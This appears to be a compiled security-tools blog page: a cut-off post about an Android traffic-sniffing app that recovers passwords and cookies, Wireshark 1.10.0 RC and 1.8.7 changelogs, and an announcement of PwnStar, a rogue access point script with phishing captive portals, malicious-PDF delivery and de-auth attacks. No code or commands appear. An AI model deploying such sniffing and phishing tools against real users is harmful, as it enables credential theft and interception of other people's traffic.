On RedesZone you have a complete manual on using SSLstrip and exactly how it works to "decrypt" SSL traffic. The application has several tabs for choosing the target, starting the packet analyzer and viewing all the traffic in detail, and also the cookies of the web pages the victim has visited.
The first thing to do in this application is to tap the radar to scan for possible targets; once the target is selected, we move through the tabs to see the different options this application offers.

Among its features, it lets us recover the password and the files transmitted on the network we are analyzing.

The requirements for this application are the following:
  • Android 2.3.3 or higher
  • Being root
  • Having Busybox installed

[Wireshark v1.10.0 RC2] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.10.0 RC 2

Wireshark 1.10.0rc2 has been released. Installers for Windows, OS X, and source code are now available. This is the first release candidate for Wireshark 1.10.0.

New and Updated Features
The following features are new (or have been significantly updated) since version 1.8:

  • Wireshark on 32- and 64-bit Windows supports automatic updates.
  • The packet bytes view is faster.
  • You can now display a list of resolved host names in “hosts” format within Wireshark.
  • The wireless toolbar has been updated.
  • Wireshark on Linux does a better job of detecting interface addition and removal.
  • It is now possible to compare two fields in a display filter (for example: udp.srcport != udp.dstport). The two fields must be of the same type for this to work.
  • The Windows installers ship with WinPcap 4.1.3, which supports Windows 8.
  • USB type and product name support has been improved.
  • All Bluetooth profiles and protocols are now supported.
  • Wireshark now calculates HTTP response times and presents the result in a new field in the HTTP response. Links from the request’s frame to the response’s frame and vice-versa are also added.
  • The main welcome screen and status bar now display file sizes using strict SI prefixes instead of old-style binary prefixes.
  • Capinfos now prints human-readable statistics with SI suffixes by default.
  • It is now possible to open a referenced packet (such as the matched request or response packet) in a new window.
  • Tshark can now display only the hex/ascii packet data without requiring that the packet summary and/or packet details are also displayed. If you want the old behavior, use -Px instead of just -x.
  • Wireshark can be compiled using GTK+ 3.
  • The Wireshark application icon, capture toolbar icons, and other icons have been updated.
  • Tshark’s filtering and multi-pass analysis have been reworked for consistency and in order to support dependent frame calculations during reassembly. See the man page descriptions for -2, -R, and -Y.
  • Tshark’s -G fields2 and -G fields3 options have been eliminated. The -G fields option now includes the 2 extra fields that -G fields3 previously provided, and the blurb information has been relegated to the last column since in many cases it is blank anyway.
  • Wireshark dropped the left-handed settings from the preferences. This is still configurable via the GTK settings (add “gtk-scrolled-window-placement = top-right” in the config file, which might be called /.gtkrc-2.0 or /.config/gtk-3.0/settings.ini).
  • Wireshark now ships with two global configuration files: Bluetooth, which contains coloring rules for Bluetooth and Classic, which contains the old-style coloring rules.
Full changelog: here

[Wireshark v1.8.7] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.


Changelog v1.8.7

What’s New
Bug Fixes
The following vulnerabilities have been fixed.
The following bugs have been fixed:
  • The Windows installer and uninstaller do a better job of detecting running executables.
  • Library mismatch when compiling on a system with an older Wireshark version. (Bug 6011)
  • SNMP dissector bug: STATUS_INTEGER_DIVIDE_BY_ZERO. (Bug 7359)
  • A console window is never opened. (Bug 7755)
  • GSM_MAP show malformed Packets when two IMSI. (Bug 7882)
  • Fix include and libs search path when cross compiling. (Bug 7926)
  • PER dissector crash. (Bug 8197)
  • pcap-ng: name resolution block is not written to file on save. (Bug 8317)
  • Incorrect RTP statistics (Lost Packets indication not ok). (Bug 8321)
  • Decoding of GSM MAP E164 Digits. (Bug 8450)
  • Silent installer and uninstaller not silent. (Bug 8451)
  • Replace use of INCLUDES with AM_CPPFLAGS in all Makefiles to placate recent autotools. (Bug 8452)
  • Wifi details are not stored in the Decryption Key Management dialog (post 1.8.x). (Bug 8446)
  • IO Graph should not be limited to 100k points (NUM_IO_ITEMS). (Bug 8460)
  • geographical_description: hf_gsm_a_geo_loc_deg_of_long 24 bit field truncated to 23 bits. (Bug 8532)
  • IRC message with multiple params causes malformed packet exception. (Bug 8548)
  • Part of Ping Reply Message in ICMPv6 Reply Message is marked as “Malformed Packet”. (Bug 8554)
  • MP2T wiretap heuristic overriding ERF. (Bug 8556)
  • Cannot read content of Ran Information Application Error Rim Container. (Bug 8559)
  • Endian error and IP:Port error when decoding BT-DHT response message. (Bug 8572)
  • “ACE4_ADD_FILE/ACE4_ADD_SUBDIRECTORY” should be “ACE4_APPEND_DATA / ACE4_ADD_SUBDIRECTORY”. (Bug 8575)
  • wireshark crashes while displaying I/O Graph. (Bug 8583)
  • GTPv2 MM Context (UMTS Key, Quad, and Quint Decoded) incorrectly. (Bug 8596)
  • DTLS 1.2 uses wrong PRF. (Bug 8608)
  • RTP DTMF digits are no longer displayed in VoIP graph analysis. (Bug 8610)
  • Universal port not accepted in RSA Keys List window. (Bug 8618)
  • Wireshark Dissector bug with HSRP Version 2. (Bug 8622)
  • LISP control packet incorrectly identified as LISP data based when UDP source port is 4341. (Bug 8627)
  • Bad tcp checksum not detected. (Bug 8629)
  • AMR Frame Type uses wrong Value String. (Bug 8681)

New and Updated Features
There are no new features in this release.
New Protocol Support
There are no new protocols in this release.
Updated Protocol Support
AMR, ASN.1 BER, BAT, Bluetooth DHT, BSSGP, DTLS, E.164, Ericsson A-bis OML, GSM A, GSM MAP, HDFSDATA, ICMP, ICMPv6, ixveriwave, IRC, KDSP, LISP Data, MMS, NFS, OpenWire, PPP, RELOAD, RTP, SASP, SIP, SSL/TLS, TCP, UA3G
New and Updated Capture File Support
Endace ERF, NetScreen snoop.
Full Changelog: here

[Wireshark v1.10.0 RC1] The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.10.0 RC1

Wireshark 1.10.0rc1 has been released. Installers for Windows, OS X, and source code are now available. This is the first release candidate for Wireshark 1.10.0.


New and Updated Features
The following features are new (or have been significantly updated) since version 1.8:
  • Wireshark on 32- and 64-bit Windows supports automatic updates.
  • The packet bytes view is faster.
  • You can now display a list of resolved host names in “hosts” format within Wireshark.
  • The wireless toolbar has been updated.
  • Wireshark on Linux does a better job of detecting interface addition and removal.
  • It is now possible to compare two fields in a display filter (for example: udp.srcport != udp.dstport). The two fields must be of the same type for this to work.
  • The Windows installers ship with WinPcap 4.1.3, which supports Windows 8.
  • USB type and product name support has been improved.
  • All Bluetooth profiles and protocols are now supported.
  • Wireshark now calculates HTTP response times and presents the result in a new field in the HTTP response. Links from the request’s frame to the response’s frame and vice-versa are also added.
  • The main welcome screen and status bar now display file sizes using strict SI prefixes instead of old-style binary prefixes.
  • Capinfos now prints human-readable statistics with SI suffixes by default.
  • It is now possible to open a referenced packet (such as the matched request or response packet) in a new window.
  • Tshark can now display only the hex/ascii packet data without requiring that the packet summary and/or packet details are also displayed. If you want the old behavior, use -Px instead of just -x.
  • Wireshark can be compiled using GTK+ 3.
  • The Wireshark application icon, capture toolbar icons, and other icons have been updated.
  • Tshark’s filtering and multi-pass analysis have been reworked for consistency and in order to support dependent frame calculations during reassembly. See the man page descriptions for -2, -R, and -Y.
  • Tshark’s -G fields2 and -G fields3 options have been eliminated. The -G fields option now includes the 2 extra fields that -G fields3 previously provided, and the blurb information has been relegated to the last column since in many cases it is blank anyway.

[PwnStar] Version with new Exploits

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables.  Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

Changes and New Features
  • “hotspot_3” is a simple phishing web page, used with basic menu option 4.
  • “portal_simple” is a captive portal which allows you to edit the index.html with the name of the portal, e.g. “Joe’s CyberCafe”. It is used for sniffing.
  • “portal_hotspot3” phishes credentials, and then allows clients through the portal to the internet.
  • “portal_pdf” forces the client to download a malicious pdf in order to pass through the portal.
Updated feature list:
  • captive-portal with iptables and php
  • more php scripts added
  • exploits added
  • mdk3 and airdrop deauth
General Features:
  • manage interfaces and MACspoofing
  • set up sniffing
  • serve up phishing or malicious web pages
  • launch karmetasploit
  • grab WPA handshakes
  • de-auth clients
  • manage IPtables

Download Here